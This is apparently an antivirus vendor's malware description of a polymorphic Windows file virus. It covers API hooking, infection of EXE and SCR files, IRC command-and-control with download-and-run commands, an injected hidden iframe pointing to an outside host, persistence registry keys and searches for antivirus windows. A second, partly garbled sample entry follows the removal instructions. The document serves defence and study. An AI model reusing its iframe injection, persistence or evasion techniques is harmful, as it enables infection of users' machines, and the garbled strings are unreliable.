Technical Details
Payload
Removal instructions
Technical Details
This file virus infects Windows executable files. It is a malicious code contained in Windows PE EXE files. The virus body is about 17 Kb, though the use of polymorphic encryption means its size may vary.
Propagation
The virus injects its code into the address spaces of all the processes running in the system. The injected code intercepts the following system functions in the ntdll.dll library:
NtCreateFile
NtCreateProcess
NtCreateProcessEx
NtOpenFile
NtQueryInformationProcess
Using these system functions, the virus tracks files that are opened and any applications launched for execution. When the virus detects a new process being launched or an executable file being opened, it infects it. Files with .EXE and .SCR extensions are infected. These files are Windows (PE EXE) applications. The virus does not infect files with names containing any of the following strings: “WINC”, “WCUN”, “WC32”, “PSTO”. When infecting a file, the virus expands the PE section and writes its own polymorphic body into it. It then modifies the program’s entry point so that it leads to the virus code.
Payload
The virus adds the executable file of the host process to the Windows firewall list of trusted applications.
Then it disables the “Restore system files” function.
The virus attempts to contact the following IRC servers:
prox*****ircgalaxy.pl
irc*****ef.pl
If a connection is established, the virus sends the following commands to the server:
NICK dewxxpyi
USER b
JOIN #.<rnd1>, where rnd1 is a random number.
Then the virus enters standby mode, ready to receive commands from the malicious IRC server and execute them.
The virus is capable of executing the following commands:
- !Get: download a malicious code from the Internet and inject it into processes running on the victim computer.
- !hosu: open specified URLs on the victim computer.
The virus also scans the victim computer’s hard drive for files with the following extensions:
HTM
PHP
ASP
If found, it adds the following string into them:
<iframe src="http://****.pl/rc/" width=1 height=1
style="border:0"></iframe>
Removal instructions
If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program: Update your Kaspersky Anti-Virus databases and perform a full scan of the computer (download trial version).
Summary
Technical details
File size of 244483 bytes.
Installation
Makes copies of itself with the following names once launched:
-
Windows system directory (usually, C:\Windows\System32) %System%\DETER177\smss.exe
-
Windows system directory (usually, C:\Windows\System32) %System%\DETER177\svAh>st.exe
-
Windows system directory (usually, C:\Windows\System32) %System%\10HT\1EMSYS19.exe
Creates the following files on an infected computer:
-
Windows system directory (usually, C:\Windows\System32) %System%\schmvi
-
Windows system directory (usually, C:\Windows\System32) %System%\sysrotdmo.sys
Malicious activity
Searches for message windows in order to protect against firewalls and antivirus programs
| Class: | AVP.Product_Notification |
clicking on the relevant button allows the program to perform the requested action
Modifies (or deletes) system registry keys in order to restrict Windows functionality:
[
System registry hive HKEY_LOCAL_MACHINEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer ]
"NoFolderOptions" = "0x1"
[
System registry hive HKEY_CURRENT_USERHKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ]
"Hidden" = "0x0"
Description:
[
System registry hive HKEY_CURRENT_USERHKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ]
"HideFileExt" = "0x1"
Description:
[
System registry hive HKEY_CURRENT_USERHKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ]
"ShowSuperHidden" = "0x0"
Searches for message windows in order to bypass monitoring and debugging:
Creates unique identifiers to flag its presence in the system
Uses the masks shown below to search for files on the victim machine:
Other activities
Runs the following files (commands):
-
Windows system directory (usually, C:\Windows\System32) %System%\DETER177\sv?h?st.exe
-
Windows system directory (usually, C:\Windows\System32) %System%\@sag>r18.sys
Searches for the following windows:
| Class: | #32770 |
| Title | NOD32 2.5 Control Center |
| Class: | #32770 |
| Title | ?????? NOD32 ?? ?????????? - [??????? ?????? ?????????? - ????????] |
| Class: | #32770 |
| Title | ?????? NOD32 ?? ?????????? - [??????? ???????????? ????] |
| Class: | #32770 |
| Title | NOD32 - ?????????????? |
| Class: | #32770 |
| Title | ?pe???pe??e??e |
| Title | ???????? ???????????? NOD32 - [Untitled] |
| Class: | #32770 |
| Title | ????????? ??????????? Personal |
| Class: | #32770 |
| Title | 0% - ??????????? ????????... |
| Class: | #32770 |
| Title | ???????? |
| Class: | #32770 |
| Title | ????????? ?????????? |
| Class: | #32770 |
| Title | ????????? ????????? ? ?????????? ????????? |
| Class: | #32770 |
| Title | ???????? ???? ??? ???????? ?? ???????????? |
| Class: | AVP.MessageDialog |
| Class: | AVP.MainWindow |
| Class: | AVP.SettingsWindow |
| Class: | AVP.ReportWindow |
| Title | Agnitum Outpost Firewall - configuration.cfg |
| Title | ????????? ??????? |
| Title | ???????? ??????? |
| Title | ??????????? ?????? : ?????????? |
| Title | ??????????? ?????? : ??????? |
Modifies the system registry keys:
[
System registry hive HKEY_LOCAL_MACHINEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ]
"Shell" = "Explorer.exe
Windows system directory (usually, C:\Windows\System32) %System%\?HT?MSYS19.exe"
Description:
Specifies the program that will be used as the user interface for Windows. Can be used by malicious programs to ensure they automatically run when the Windows OS boots
[
System registry hive HKEY_LOCAL_MACHINEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ]
"lsass" = "
Windows system directory (usually, C:\Windows\System32) %System%\DETER177\lsass.exe"
Description:
Used to automatically run files when the Windows OS boots
[
System registry hive HKEY_LOCAL_MACHINEHKLM\SOFTWARE\Classes\scrfile ]
"(default)" = "????? ? ???????"
[
System registry hive HKEY_LOCAL_MACHINEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ]
"?tfm?n.exe" = "
Windows system directory (usually, C:\Windows\System32) %System%\?tfmon.exe"
[
System registry hive HKEY_CURRENT_USERHKCU\Software\Microsoft\Windows\CurrentVersion\Run ]
"?tfm?n.exe" = "
Windows system directory (usually, C:\Windows\System32) %System%\?tfmon.exe"